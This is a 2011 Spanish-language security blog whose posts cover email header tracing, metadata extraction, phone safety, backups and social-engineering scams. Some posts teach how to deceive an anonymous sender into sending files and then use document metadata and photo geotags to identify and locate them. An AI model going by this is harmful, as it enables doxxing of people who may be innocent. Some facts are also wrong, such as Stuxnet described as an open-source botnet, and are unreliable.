noviembre 18, 2011

Persiguiendo Anónimos parte I

En uno de los comentarios del este post un usuario me comenta que aha recibido un correo anónimo y que aunque puede ver cual es la IP desde donde se ha enviado el correo electrónico, esa información no le es suficiente para averiguar quien es el "anónimo molestador".

Lo que les puedo decir es que encontrar al hijoPu que está enviando los anónimos electrónicos es una tarea más de pericia y maña que de conocimientos técnicos.

Generalmente un correo anónimo nunca llega sólo y menos si no prestamos mucha atención, así que si nuestra reacción es mesurada podemos tratar de intercambiar correos con nuestro anónimo amigo con el objeto de obtener más información que nos permita descubrir quien es.

*Fondo musical de Misión imposible*

Lo que yo haría sería contestar al correo electrónico (con maña) diciendo que se ha equivocado de uasuario, que lamento haber leído lo que le ocurre pero que seguramente no soy yo a quien busca.

eso provocaría que quien nos quiere molestar conteste aseverando que si soy yo quien está buscando.

a lo que yo respondería que si es así, entonces necesito pruebas de lo que dice, que me envíe archivos, fotos, videos, etc. para probar lo que dice.

y aquí es donde viene la parte Hacker técnica del asunto.

De un archivo Ofimático, audio, foto o video podemos extraer algo que se llaman metadatos. (pocos usuarios domésticos conocen de esto y por ahí podemos obtener bastante información)

(Si tu anónimo amigo sabe de esto y limpia los archivos tendrás que darte otras mañas)

Digamos que he logrado hacer que mi molestador me enviase 2 archivos para "demostrar" lo que me está diciendo, en este caso una fotografía y un archivo de power point.

para esta Prueba de concepto voy a utilizar el programa FOCA free de informática64.com y los archivos son míos.

primeramente voy a analizar el archivo de power point.

La FOCA sirve para muchas cosillas pero para este ejemplo sólo la utilizaremos para revisar los meta datos de los archivos en cuestión, es tan fácil como arrastrar y soltar los archivos en el programa y posteriormente un click derecho sobre ellos me permitirá "extraer" los meta datos.

al revisar los meta datos del archivo con la FOCA, podemos ver que es aparecen 2 nombres de usuario, cosa que ya nos da una pista de quien puede ser nuestro "anónimo" .

ya con los nombres puedes comenzar una búsqueda por google, linkedin, facebook, y demás sitios que se te ocurran. El chiste es obtener mucha información.

ahora analizando la fotografía:


Los dispositivos de hoy hacen muchas monerías, y una de ellas es ponerle "GeoTags" a las fotos, los iphones y muchas cámaras los tienen activados por default, y como pueden ver en este caso  ver la información puede ser reveladora.

en este caso, si ponemos las coordenadas de esta forma en google maps. 21°52'32.09999N 102°17'27.17995W -  "Taaa-daaaaaa"

Tenemos la ubicación de nuestro objetivo en el mapa,

(además de los Geotags - que es lo más util de esto- hay ocasiones en las que la foto no tiene geoposición, pero se pueden obtener datos como la marca de la cámara/teléfono, modelo, fecha y hora de la toma, cosa que nos puede dar pistas de quien de nuestros amigos conocidos puede ser sospechoso)

Esto es una prueba de concepto y por lo tanto me salió a la primera, no quiere decir que siempre sea así , a veces los archivos pueden ser reutilizados o las fotos tomadas en otros lugares, pero con pericia y maña, lo que aquí tratamos es obtener información de nuestro anónimo.
(y claro, sentir la adrenalina de jugar a los detectives/espias }:D )


espero no haber sido muy técnico con esto. como dije es una prueba de concepto pero yo algo así trataría de hacer.

saludos seguros.

noviembre 15, 2011

Chuck Norris y 0-Day?

Saludos Amigos,

como hace tiempo que no he tenido tiempo de escribir por las diferentes labores que realizo en la actualidad y que no me permiten estar de lleno en el camino de la seguiridad informática, el día de hoy en twitter es #MartesDeChuckNurris y hace pocos días leíun artículo que me hizo mucha gracia y me recordaron al gran Chuck. El pasado 8 de Noviembre  Microsoft hizo pública una vulnerabilidad (MS11-083) en la implementación de las librerías que controlan las comunicaciones TCP/IP de la computadora, mediante la cuál un atacante podría enviar un flujo continuo de paquetes UDP especialmente manipulados para ejecutar remotamente código en los sistemas Microsoft Windows.

Lo más curioso de esta vulnerabilidad es que los paquetes UDP deben ser enviados a un puerto ¡cerrado! (#WTF) del sistema objetivo, lo que en Twitter ha sido tomado como una gran broma y se han hecho comentaros como  "MS11-083 fue descubierta por Chuck Norris", "Chuck Norris puede explotar sockets que incluso no están escuchando".

De momento a la espera de un parche y esperando que siga siendo más gracioso que algo que se convierta en una tristeza para muchos.

Esa es mi contribución hoy al #MartesdeChuckNorris y al mundillo de la seguridad.

saludos seguros.

octubre 05, 2011

conoce StuxNet y un 0-day con un buen video

El día de hoy cayó en mis manos un video que me parece por demás interesante, además de que la animación está muy bien lograda, explica de manera clara que es StuxNet y un 0-day .

gracias a @dustmx y a @pcoronaf por compartirlo en un Twit

para los que no han oido hablar de StuxNet, esta es la red de Robots o zombies (computadoras infectadas) mas grande del mundo es de código abierto y amenaza  infraestructuras muy grandes de nuestro orbe.

una vulnerabilidad de día 0, es aquella que tiene poco de haber sido descubierta y aun no hay un parche que arregle dicha vulnerabilidad lo cual permite tomar ventaja a quienes conocen dicha vulnerabiliad mientras no sea parchada.
(MAC y linux también tienen este tipo de vulnerabilidades no se rían ¬¬ )

Pero un video es mejor que todas mis palabras.




Saludos Seguros.

¿Dudas?


octubre 03, 2011

verifica el camino antes de caminarlo

Como reza el dicho popular:

Ojos que no ven, corazón que no siente.

Y es que es justamente eso lo que usan algunos malandros de la red para hacernos caer en las trampas que ponen, ya que se ha puesto de moda acortar las URL's para que o cupen menos espacio, sobre todo en twitter y facebook, ya que una URL como esta: http://seguriblo.blogspot.com se convierte en:  http://bit.ly/oReqgK   o http://TeVoyaMeterUnVirus.com se convierte en esto: http://bit.ly/qTuUyO  

Pero como los usuarios caemos de repente en un exceso de confianza, y  como no vemos la dirección real  vamos haciendo click en todo enlace que cae en nuestras manos y mas cuando este promete mostrar desnudos  información importante para el lector. 

Pero no todo está perdido, dando vueltas por la red me encontré un servicio de Norton que verifica los enlaces antes de hacer click en ellos. y así de alguna manera asegurar al usuario que el sitio al que va a entrar es seguro y no corre algún riesgo que conozca norton.


El servicio es gratuito y como muchos saben, norton no es de mis suites favoritas, pero peor es andar por la vida sin calzones protección.

Saludos Seguros.

septiembre 28, 2011

¡Amaaa, querooo ser Jaquer puesn!

El día de hoy he cumplido una de las metas que me he propuesto como profesionista: ser expositor en un evento de tecnologías de información.

y aunque el primer intento por dar una charla fue fallido en mi propia alma mater, la universisad Autónoma de Aguascalientes, ya que cancelaron mi participación a días inaugurar se evento.

Fue el Instituto Tecnológico de Aguascalientes quien me ha abierto las puertas para comenzar con esta aventura de dar charlas de seguridad (ya antes me habían invitado), y la verdad es que los asistentes y los organizadores me brindaron una experiencia muy gratificante.

Cuando se pusieron en contacto para invitarme el primer tema que se me vino a la mente fue el de hablar de como iniciar en el mundo de la seguridad informática, pero... ¿cómo hacer que fuera atractivo para los jóvenes?

Preguntando a @cyberpostpunk  y a @pcoronaf  me sugirieron la desmitificación de la imagen del hacker, así fue como surgió el título y lo demás pues es material de la charla.

La idea fue que los jóvenes estudiantes quitaran el velo de misterio que envuelve la palabra hacker y que los medios presentes, maestros y demás asistentes pudieran definir lo que significa verdaderamente esta palabra.  Incluso cité a uno de los mejores informaticos forenses de este país @cibercrimen cuando dice: "hola, soy hacker y tengo esposa" XD

Platicamos de como empezar en este camino, de como aprender y como continuar capacitandose como entusiastas de la seguridad informática, que es lo que se puede hacer y que es lo que no se puede hacer, en fin, que no nada más es agarrar y decir "Ama, quiero ser hacker! ahorita vengo"  es un camino de autoformación, practica y más práctica.

Una gran, gran, gran experiencia.

aquí les dejo la presentación

Amaaa Queeero Ser JaQuer

Y si alguno de los asistentes me comparte fotos o videos aquí los iré colgando.

gracias a todos y hasta la proxima.

Saludos Seguros!

PD. ahí mismo me salieron propuestas para 2 charlas mas en el mes de octubre. XD  agarremos vuelo

agosto 21, 2011

Malo para las contraseñas? RainbowCards

El otro día discutiendo con algunos amigos acerca de las técnicas que utiliza la gente para "crear" sus contraseñas (que yo creo que son muy pocos los que de verdad crean sus contraseñas) y que todos terminan en algún momento utilizando palabras fáciles de recordar y/o en algunos casos utilizan la misma para todos sus servicios electrónicos como ya lo mencionaba yo hace algún tiempo.

Y en el albor de la platica pasamos al tema de las tarjetas de coordenadas que usa bancomer y que a mi en lo personal no me gustan nada (para el tema bancario aclaro) tema que ya había discutido por twitter con @vladkov en su momento.

Fig. 1 Tarjeta de coordenadas al estilo de Bancomer

Entonces alguien comentó sobre las RainbowCards (que #YoConfieso no conocía) entonces me dí a la tarea de buscar un poco sobre el tema en san Google después de la platica, y la verdad es que me gustó mucho la idea para el usuario principiante o porque no decirlo: el usuario común de internet. 

las RainbowCards son unas tarjetas de coordenadas que puedes crear en http://www.rainbowcards.org/es a partir de una palabra clave que tu proporcionas y que a través de un algoritmo generan una serie de caracteres que te pueden ayudar (ahora si) a crear cuantas contraseñas sean necesarias.

Fig. 2 Generando tarjeta a partir de la palabra clave: "SeguriBló"


Con este método no necesitas memorizar tus contraseñas conque puedas asociar colores a cada servicio estás del otro lado ;) 
Fig. 3 tarjeta generada


Está tarjeta puede incluir incluso algunos renglones para que puedas generar también combinaciones para nips.

Ahora tu reto más grande en jugar con la forma de hacer las combinaciones para crear tus contraseñas por ejemplo diagonales, cruces, derecha-izquierda, saltos.... en fin. a mi que me gusta el ajedrez podría relacionar cada servicio al movimiento de una pieza.

Estas tarjetas las puedes imprimir y enmicar para llevarlas contigo a todas partes; incluso si la pierdes http://www.rainbowcards.org/es puedes reimprimirla y quien encuentre la extraviada no tendría ni idea de cuales son tus contraseñas.

En fin, este puede ser una herramienta para cuando no puedes confiar ni en ti mismo tu propia seguridad (chiste informático) o como nosotros diríamos: cuando la capa 8 es un factor de riesgo (otros chiste informático XD ) 

como siempre digo: la seguridad empieza en uno mismo.
Saludos Seguros.

PD. haciendo la busqueda de la tarjeta de coordenadas de Bancomer en Google Imagenes (me dio hueva sacarle una foto a la mía a estas horas) con: "tarjeta coordenadas bancomer" salio en la pag. 3 imagen 3 la mejor escritora a destajo que conozco en el mundo 2.0  @DorisFM 

Así que este post va dedicado a ella por ser "Midola" y por salir en Google, Eres grande Dorix


julio 02, 2011

Identificando Remitentes Parte II

Ya hablamos de como encontrar la IP en un correo electrónico recibido a través de Hotmail, el día de hoy voy a compartirles como encontrar la IP remitente de un correo recibido a través de Gmail.

1o. leyendo el correo en Gmail hacemos click en el menu "responder" para que salgan más opciones
2o hacer clieck en "mostrar original"

Figura 1. Accediendo a todos los datos del correo

Aparecerá el correo completo con todo y sus cabeceras.
aquí podremos buscar el valor recibed from:

Figura 2. obteniendo la IP remitente

y con la IP en mano procedemos a geolocalizar a nuestro "enviador" :P


Esta es la forma más básica de saber de donde ha salido un correo electrónico.

No es toda la información, pero es el comienzo, dependerá mucho de tu pericia para encontrar a quien envía realmente un correo electrónico.

Te puedo decir que lo que mejor se puede hacer es entrar en contacto con "anonimo" y tratar de usar todo tu ingenio para entablar una conversación (y echar mano de lo que llamomos nosotros: ingeniería social) para poder obtener información y la mayor cantidad de detalles del "anonimo" y así poder relacionar toda la información que le saquemos y así perfilarlo (a lo Criminal Minds XD )

En otro post te contaré como usar una herramienta pública para tenderle una tramapa en la serie de correos que se envíen en la conversación.

saludos seguros!

junio 04, 2011

Cómo rastrear correos electrónicos, para no expertos

¿Alguna vez han recibido un correo electrónico “anónimo”?  Podría apostar que la mayoría a recibido alguno.  Esta semana vino a mí una persona que había recibido uno de estos correos, preguntándome si existía de alguna manera de rastrearlo.

La respuesta es si, pero hasta cierto punto. ¿Por qué? Lo explicaré más adelante, lo primero que hay que saber es que el lenguaje que las computadoras “hablan” en numérico, es decir lo que entienden son números.
Al igual que las personas tenemos direcciones en las que se nos puede encontrar, las computadoras  en internet también tienen direcciones para poder encontrarse entre ellas y para poder enviar y recibir información, la computadoras usan direcciones de Internet (Direcciones IP) – La IP es de Internet Protocol en inglés
Una dirección IP se compone de 4 grupos de números cómo sigue:

xxx.xxx.xxx.xxx  con números se vería así 255.255.255.255

Cuando se creó el sistema de direcciones se pensó que esa cantidad de direcciones (4,228,250,625) serían suficientes para conectar todas las computadoras del mundo, pero en la actualidad nos las hemos terminado. En fin ese es otro tema.

Pero lo que es importante de eso, es mencionar que para evitar que se nos acabaran las direcciones de internet  más rápido, se determinó que las redes  caseras (!si¡ en las casas ya hay redes o_O una casa con internet inalámbrico seguro tiene una laptop y/o algún otro elemento que se conecta al Internet un teléfono, un videojuego, etc. )  Utilizarían direcciones en el rango de 192.168.1.xxx las redes de empresas utilizan direcciones en el rango de los 10.10.xxx.xxx. 

Estas redes utilizan sólo una dirección de internet parta salir al mundo.  (Espero no ser muy confuso hasta aquí)

Con esto quiero decir que detrás dela dirección de internet 65.128.45.18 puede haber  2, 24, 200, o x número de computadoras.

Por lo que un rastreo simple y para dummies de un Email nos puede llevar hasta este punto, es decir hasta la dirección IP que es pública y que se ve desde Internet, que es la que me otorga mi proveedor de Internet.

Hasta ahí la teoría, ahora la práctica.

Veamos.
Los correos electrónicos contienen más información de la que los usuarios comunes vemos, está información es utilizada por los programas que reciben los correos electrónicos para clasificarlos y etiquetarlos.  Esta información es llamada encabezados o cabeceras-
Los encabezados
Es información que contiene datos interesantes dentro del propio correo electrónico, como por ejemplo:
Hora de envío, servidor por el cual salió, servidor que lo recibió, IP de donde se envió el correo, si lleva copias o copias ocultas.

Debo aclarar antes de proseguir que un rastreo de correo electrónico no nos mostrará el nombre de la persona que envía el correo, la calle donde vive, numero de su casa o teléfono.
Lo que obtendremos de los encabezados para poder hacer un rastreo de correo electrónico será la dirección IP de donde el correo fue enviado lo que nos llevará casi siempre a la ciudad y al Proveedor de Servicios de Internet (ISP)

Como leer los metadatos para obtener la IP

En Hotmail
Debes entrar a leer un correo, hacer click en la flecha pequeña que está debajo de la fecha y seleccionar la opción ver código fuente
Figura 1. Como leer encabezados del correo en Hormail



Verás muchos datos, pero el que nos interesa obtener es la IP que generalmente está etiquetada como X-Originating-IP
Figura 2. Obteniendo la IP de origen a través de los encabezados


¡Y listo! Hemos obtenido la IP  de donde salió el correo electrónico.
Cuando hemos obtenido la dirección IP podemos usar un servicio como http://whatismyipaddress.com/
Y así conocer la ubicación geográfica en donde se encuentra la IP que obtuvimos anteriormente.
Figura 3, Ubicando geográficamente la Dirección IP con http://whatismyipaddress.com/


Es así como se puede comenzar a hacer un rastreo de un correo electrónico.
Con esto algo de investigación al estilo inspector gadget y un poco de sentido común puedes deducir quien es el “anónimo” que envía los correos electrónicos

En un siguiente post mostraré como leer los encabezados en Gmail y en Yahoo

¡Saludos Seguros!


abril 12, 2011

De Kilos a kilos ¿compraste tu conexion pensando en gramos?

Aunque este sitio suele hablar de cosillas de seguridad, hoy voy a tomar un tema tecnico para tratar de hacerlo menos técnico.

Vamos a hablar de las diferencias entre la medida de la velocidad de las conexiones ADSL y las que usamos para hablar de almacenamiento de  datos.

Las conexiones ADSL en nuestro pais son proveidas por diferentes empresas:  como Telmex, Telecable, Gigacable, yoo, etc.  Una conexión ADSL se caracteriza por ser asíncrona; es decir el tope de velocidad de descarga de información es diferente al que tope que se usa para subir información.
Entremos en detalles:
Cuando hablamos de velocidades y almacenamiento podemos ver algo como esto: Kbps y KB/s.
Para medir los datos tenemos:
  • Bit: Es la unidad mínima. Es un 1 o un 0 en computadoras
  • Byte: son 8 bits. Esto representa un carácter de un archivo.
  • bps: son los bits por segundo que se usa para medir la transferencia de la información
  • Bytes/s: es igual a 8 bits por segundo. Un carácter por segundo.
  • Cuando se involucre una /s hablamos de velocidad de transmisión, cuando no este presente se habla de almacenamiento.
Pasemos a los kilos, (¬¬ ¡no señoras no esos kilos! #Jum) donde podemos considerar que 1KB son 1000 bytes aunque estrictamente en informática son 1024 bytes.
Entonces tendremos:
• 1000 bits son 1 kbit
• 1000 bps son 125 Byte/s
• 1024 bytes son 1 KB
• 1024 bytes/s son 1 KB/s
• 1024 Kbytes son 1 MB
• 1024 Kbytes/s son 1 MB/s

Cuando contratamos ADSL nos venden velocidades de 256 Kbps, 512kbps ,1 mega (1024 Kbps) y así, o sea  2 elevado a la x potencia.

Y nosotros cuando hablamos siempre decimos orgullosamente bajamos a tantos  KB/s
Nosotros no bajamos un megabyte por segundo si no un megabit.

Si deseas saber la velocidad de descarga en bps entonces vemos que si el programa de descarga dice: bajando a 40 KB/s  estaremos descargando unos 40000 caracteres por segundo. Si 40 lo multiplicamos por 1024 tendrás el número exacto (40960) y si lo multiplicas por 8 tendrás los bps en este caso 327,680bps.
Para estimar como eran (¡Si! A mí me tocó usar módems telefónicos todavía ¬¬) y como son las velocidades según el tipo de conexión. Dividimos entre 8 que son los bits en un byte, para determinar cuál “debería” ser la cantidad en bytes por segundo en una descarga. Si quisieras saber cuántos caracteres por segundo descargas solo agrega tres ceros las cantidades de abajo.

  • Modem antiguo: 28,8 Kbps— 3,6 KB/s
  • Modem moderno: 57,6 Kbps—- 7,2 KB/s
  • Adsl Antigua: 256 Kbps—- 32 KB/s
  • Adsl Antigua: 512 Kbps—- 64 KB/s
  • Adsl normal: 1024 Kbps (1 Mbps) —- 128 KB/s
  • Adsl normal: 2048 Kbps (1 Mbps) —- 256 KB/s

Hay empresas de servicios que se aprovechan de la confusión entre KB/s y Kbps (no he dicho Telmex en ningún momento ni lo volveré a decir ¬¬)  De todas maneras siempre que contratamos una línea con adsl nunca vamos a tener lo que nos dicen. Si tenemos suerte y alcanzamos más del 80% de lo contratado
estaremos seguros de tener una buena conexión.

La velocidad se puede ver afectada por muchos factores, la distancia de los cables hasta el  la central local de teléfono o cable, la cantidad de usuarios en tu misma calle, la saturación de las líneas en los equipos, las instalaciones de los usuarios, y sin hablar de un espacio que no se controla que es internet donde hay muchos enrutamientos que hacen también que se demore la información.

Así que cuando te quieras contratar una línea no dejes que te  traten de engañar, ahora sabes la diferencia entre Kilos y kilo :) es decir kbps y KBps
Saludos seguros

abril 05, 2011

¿Usted sabe donde esta su teléfono ahora?

Hace unos cuantos días, platicaba con una amiga sobre un incidente que tuvo con su teléfono celular y me dejó reflexionando en como los usuarios de estos dispositivos no tienen la suficiente conciencia de la información que un aparatito de estos puede contener y como somos poco cuidadosos de ella.

Ella es asistente de un funcionario público, y como asistente, en su teléfono tiene almacenados los teléfonos de los jefes de su jefe, los mensajes de texto que le envía dándole indicaciones, fotografías de eventos y actividades.

La información por si sola no representa mucho, pero imaginen que ese teléfono cayera en manos de una persona con resentimiento al funcionario publico, o en manos de algún malandrín que buscara extorsionar a alguien.

La forma en que guardamos nuestros contactos (mama, papa, amor, abue, etc) le puede dar mucho material a un ciber delincuente.  O imagina en un arranque de pasión te tomas fotos con tu espos@ o novi@ u lo que sea O.o en ocasiones no es cómodo que otras personas estén viendo tus cositas sin tu consentimiento #Dicen u_u

La solución: nuestros teléfonos deben estar bloqueados con contraseñas, esto protegerá o hará más difícil el acceso a los datos del teléfono,

Identifica el  MEID o ESN de tu teléfono, que es un número único que lo identifica de manera mundial y que sirve para que los operadores telefónicos puedan prestarte servicios específicos dependiendo del aparato. Si identificas y  guardas este numero, en caso de robo de tu teléfono puede llamar a tu operador y pedir que pongan ese aparato en la lista negra y que nadie más pueda volver a utilizarlo.

La forma mas sencilla de encontrar este numero es retirando la bateria del telefono y revisar la etiqueta con codigos de barras. ahi encontraras un numero como ESN o MEID puede estar en decimal o hexadecimal


Hay teléfonos que cuentan con la opción de realizar un “Wipe” (formateo) a distancia. Lo que permite proteger tu identidad y la de tus contactos ¿Cómo saberlo? Lee el manual, (si ese librito que viene en la caja y que tal vez nunca hayas leído)

Recuerda, tú determinas hasta donde te expones, en estos temas es mejor ser un poco paranoico, a que llamen a alguno de tus contactos tratando de extorsionarle o tener que aguantar que el video de tu ultima borrachera aparezca en youtube.

Saludos seguros.

marzo 30, 2011

El mayor riesgo a mi seguridad 2.0 ¡Yo mismo!

Como siempre lo he dicho, la seguridad informática no solo se refiere a Hackers y robo de información, muchas veces el riesgo para nosotros ¡somos nosotros mismos!

Y ahora me explico un poco mejor, digo que el mayor riesgo para uno es uno mismo, porque en ocasiones con nuestra conducta ponemos en riesgo nuestra integridad en la red.

A ver si me aclaro.

Después de leer esta noticia donde unas fotografías del cónsul de Panamá en las Islas canarias lo metieron en serios apuros con sus compatriotas, al grado de pedir su destitución. Pero lo mas grave aquí no es que en la fotografía  aparezca vestido de mujer. Lo curioso (grave) es que el pie de la foto diga “FACEBOOK” como fuente de esta.

¡Si! Facebook, creo que aquí ya llegue a mi punto. La brecha de seguridad para esta persona, es ella misma en realidad, pues muy seguramente el mismo subió esa foto a su perfil, o alguien muy cercano, pero quien te asegura que  tus amigos tienen bien configuradas sus parámetros de privacidad, como yo digo en este tema “Los amigos de mis amigos NO son mis amigos” #PosOye

Esto nos recuerda casos como el del senador de EU que apareció con el torso desnudo en su perfil de un sitio de citas. Hay casos también de gente que esta de incapacidad en su trabajo por “fuertes lesiones” y en el inter aparecen fotos en Facebook donde se le ve bailando al ritmo del meneito.

O aquello de las dos Chinas de Alicia machado refiriéndose a las Coreas en Twitter

o los desafortunados comentarios de DulceMaria sobre haciendo referencia al tsunami de Japón.


Las opiniones que vertimos sobre Twitter no solo las leen nuestros amigos, siempre hay alguna manera de que alguien (guiño) se entere de lo que decimos (a pesar del candadito)

O aquellos que celosamente cuidan sus datos personales, pero tienen su dirección y teléfono personal publicado en las bolsas de trabajo en Internet.

Tengamos en cuenta que Internet es P U B L I C O, si así como lo leen es PÚBLICO y no olvida lo que se le cuenta.

Por todo esto, es que me atreví a decir que el mayor peligro para uno, es uno mismo, pues terminamos dando información, haciendo comentarios, o dejándonos ver en situaciones que ponen en riesgo (guiño, guiño) nuestra integridad en Internet.
La seguridad informática empieza en uno.

Saludos seguros.

marzo 09, 2011

Matar a un hijo

En el mundo de la seguridad se puede ver de todo, aunque muchos se imaginan que toso es entrar en computadoras y romper passwords, la seguridad informática abarca muchísimas cosas. Y el día de hoy les voy a platicar de como un padre decide matar a un hijo, si así como lo oyen.

EL propio Microsoft a decidido matar a uno de sus hijos: Internet explores 6, ese navegador que tantas dichas y disgustos les  dio y no sólo a MS, también a Google le generó un buen dolor de cabeza 

El propio Microsoft lanza desde su cuenta de twitter el siguiente mensaje: 

No es acostumbramos a animarte a que dejes de usar uno de nuestros productos, pero para #IE6, vamos a hacer una excepción:

y nos invita a pasarnos po el sitio http://ie6countdown.com/ dedicado a medir en todo el mundo el uso de Internet explorer 6, obviamente a MS le interesa que este navegador salga de circulación pues es uno de sus productos más utilizados por los ciberatacantes. 

  1. Aconseja a los usuarios a actualiza
  2. Educar a otros. (no dejes que tus amigos usen software riesgoso (IE6) 
  3. Comunica la vulnerabilidad.
es curioso ver como a 10 años de su lanzamiento este navegador aun tenga una presencia tan importante en el mundo, yo por "politcas" de la empresa aun lo tengo que usar pues en el no "fallan" las aplicaciones que usamos.

en lo personal tengo más de un navegador en mi equipo, siempre es bueno tener a mano opciones para hacer tavesuras experimentos.

Saludos Seguros
Felipe

marzo 04, 2011

Stalkeando como Hacker

La palabra Stalk (Stalker) se ha puesto de moda gracias a la dichosa curiosidad que nos caracteriza como seres humanos. Muchos lo confunden con "Acosar" pero esa palabra aunque mas morbosa no define la acción como tal.

En la wikipedia dice en una de las definiciones:
"Stalking, an act of intrusive behavior or unwanted attention towards a person"
Dice: um acto de comportamiento intrusivo o atención no deseada por una persona

Es decir que si tu buscas en el viejo Directorio Telefónico de papel, ¿existe aun?  un teléfono y ves una dirección, literalmente estás stalkeando.

Pero lo que me tiene aquí es un ejercicio que realicé el día de hoy para encontrar un documento que yo estaba seguro que se encontraba en la red y en un sitio muy visitado. por lo que eche mano del amigo Google.

Oh pero primera sorpresa! ¡¡¡EL sitio no existía más!!! #WTF yo pensé que estaría ahí por siempre  ¬¬ ¿y ahora que podía hacer? pues lo que hace un Hacker de sombrero negro para encontrar la información necesaria para orquestar un ataque a algún sitio.

Lo primero:
Si el sitio ya no existe (es más adecuado decir si ya no está online) recordemos que internet no olvida, podemos entonces utilizar una herramienta genial http://web.archive.org la máquina del tiempo de internet, si aunque no lo crean estos es lo primero que hay que revisar, sobretodo porque antaño, publicar nombres de usuarios, teléfonos, direcciones, estructuras organizacionales, etc. etc. no estaba  de más y ahí se puede encontrar muuuuuucha información }:¬)



Pues bien, ahí encontré que la pagina que yo quería visitar dejó de existir en noviembre del 2008.  por fortuna el detalle que guardan ahí es grande así que encontré el archivo que estaba buscando, pero.... por situación de espacios de almacenamiento, la máquina del tiempo no almacena contenidos.


Así que utilizando Google Dorks (creo que ya hablamos de ellos) y el nombre del archivo lance una búsqueda por internet, y el fabuloso google me regresó el único URL olvidado que aun contenía el archivo en cuestión.
Dorks utilizados: inurl: , filetype: , intitle, 
Al parecer se perdió el dominio pero los archivos siguen ahí en un servidor olvidado en la red.

Con estas dos técnicas un usuario malintencionado puede obtener información (aun sin rayar en lo ilegal pues toda la información que se encuentra es pública) suficiente para orquestar un ataque para encontrar una puerta de entrada.

A un usuario común de redes sociales le pueden servir para enriquecer su stalkeo.


saludos seguros 0=¬)

febrero 28, 2011

Todos hemos perdido un Disco Duro

El otro día un twit de @synsol me dejo pensando en este tema, y ayer cuando @elmunoza comentó que había perdido información por hacer espacio en su disco duro me decidí a escribir este post.

La perdida de información por robo o por daño de nuestro Disco Duro. ¿Cuantos de nostros hemos perdido una Laptop? (ya sea extrabiada o robada) o cuantos de nosotros hemos sufrido de uno de esos errores de Hardware que dañan por completo el disco duro y lo peor de esto no es el daño físico sino la perdida de la información que ahí se encuentra.

En culturas como la nuestra, donde abusamos de nuestra buena suerte, el "a mi no me va a pasar", o "mi conputadora no es chafa", " a mi nunca me han abierto el coche" los respaldos suelen ser cosa de "Exagerados", "Frikis" o "Paranoicos"

Y dejemos para otro post el tema de la encriptación, lo nuestro el día de hoy es el tema de respaldar información, hoy los discos duros son muy grandes y respaldarlos en DVD's es ahora poco practico, por eso que .te puedo compartir:

Lo que no haría,

  • Hacer un respaldos y guardarlo en el mismo disco duro pero en otra partición.
  • Hacer un sólo respaldo 
  • Guardarlo ese único respaldo en una memoria USB
  • Respaldar los programas (SO, ofimáticas, y demás instalables)
Lo que si haría
  • subir a la "nube" los archivos más sensibles, tesis, artículos, Curriculums, tareas, fotos.
  • En este tema Google Docs ofrece buenas herramientas y un buen espacio de almacenamiento
  • Aunque es relativamente nuevo MS Office Live tiene una muy buena interfaz y el espacio también es bueno
  • Si no te convence lo anterior, siempre puedes mandarte el archivo por correo electrónico a tu propia cuenta y dejarlo ahí como respaldo.
  • Hacer varios respaldos en medios diferentes: Disco Duro externos, memoria USB, DVD, etc.
  • ENCRIPTAR el disco duro, por si la Laptop es robada, que no puedan robarse mi información 

Si consideras que esta lista se puede mejorar, te invito a dejar tu aporte.

febrero 23, 2011

La seguridad empieza en casa - de llamadas y extorsión

En estas días ha estado en el aire el tema de las llamadas telefónicas de extorsionadores, antes uno sólo leía esas cosas que le pasaban a los "riquillos", poco después uno escuchaba de boca de alguien que a "un conocido" lo habían llamado por tal o cual cosa para sacarle $$$ y ahora nos cuenta de primera mano alguien a quien "ya le paso"

Como hace menos de 3 días mi señora madre me contaba la "extraña" historia de la llamada que recibiera el domingo:

Riiiiiin Riiiiin (timbre de telefono) 
Mamá: diga?
extraño: Tía? eres tu?
Mamá: Tía? .. Quien habla?
extraño: Pos tu sobrina tía... el que anda aca  <--- ¬¬ 
Mamá: aca donde?
extraño: pos aca del otro lado (Estados Unidos)? 
Mamá: mmm sólo que seas marco  <--- Error no 1
Extraño: ya vio tía como si se acuerda?
Extraño: Fijese que voy para el pueblo, y pues al pasar la frontera como traigo muchos regalos y una toca 
             nueva pues los policías me la quieren quitar y me dicen que si no les doy $$$$ no me regresan las 
             cosas y pos hasta le llevo un regalo.
Mamá: huy hijo, yo ya ni trabajo y no tengo dinero  
Extraño: ire tía, le doy chance de que junte un dinerito y mañana le hablo.
Mamá: anda pues hijo mañana hablas a ver que te junto.

hasta este punto el único error de mi santa madre fue darles un nombre, ella se quedó reflexionando lo sucedido y esperó al día siguente la llamada de "Marco"

Día siguiente 9:00 AM aprox.

Riiiiin Riiiiiiiin
Mamá: Diga? 
Extraño: Tía como estas? nosotros ya desayunamos y estamos bien ya nomás me falta ir por las cosas
             que los policías nos quitaron ¿cuánto me juntó tia? 
Mamá: Fíjate hijo que estuve tratando de juntar pero no pude....
Extraño: Como   no tía?? ni mil pesitos? 
Mamá: no hijo, pues ya soy jubilada y pues tus primos son unos lacras que no me dan ni para tortillas
Extraño: chale, y no puede comprar unas tarjetas de celular y me pasa los números? <-- ¬¬ pinchis!
Mamá: Fíjate que no puedo hijo
Extraño: chin! y no me puedes dar el teléfono de alguno de mis tíos para hablarles? <-- que cara!
Mamá: Fíjate que no!
          Además estuve pensando que: 
           Que en 20 años no me habías siquiera escrito una postal
           Que no te ocupas ni de tu madre  
           Que no viniste ni al entierro de tu padre
           Que te mandes solicitud en facebook y ni siquiera me aceptaste. 
           Así que mejor pídele ayuda al gobierno que yo no tengo para darte <--- BRAVO!!!
bip bip bip bip 

El malandrín había colgado!

Visto desde el punto de la seguridad informática esto es un ataque de ingeniería social, en esta técnica no hacen falta computadoras ni programas sofisticados los muy atacantes llaman una o dos veces antes para conseguir nombres, relaciones familiares, teléfonos y demás información para llevar a cabo su retorcida acción y aprovecharse de los ingenuos usuarios que no tienen ni el más mínimo reparo en dar la información a quien sea o que carecen de un mínimo entrenamiento.



Al igual que en las empresas, en nuestras casas debemos instruir a las personas que contestan el teléfono a que no den información que no les sea solicitada, además de identificar que información si se puede dar y cual no.

En esta historia el final no fue triste (por fortuna) pero en muchos casos los Malandros si logran su objetivo y son muchas las historias, esta es la del pariente con regalos y frontera, pero también manejan la del secuestro, la del amante y más. 

Los ataques a la seguridad no sólo son a sitios web o firewalls de empresas, se aplican estas mismas técnicas para obtener nombres de responsables de Tecnología, comunicaciones, informática, de jefes en general, teléfonos, correos electrónicos incluso hay atacantes que se presentan en las empresas y usan sus "encantos" para obtener información que pueda ser utilizada para un posterior ataque.

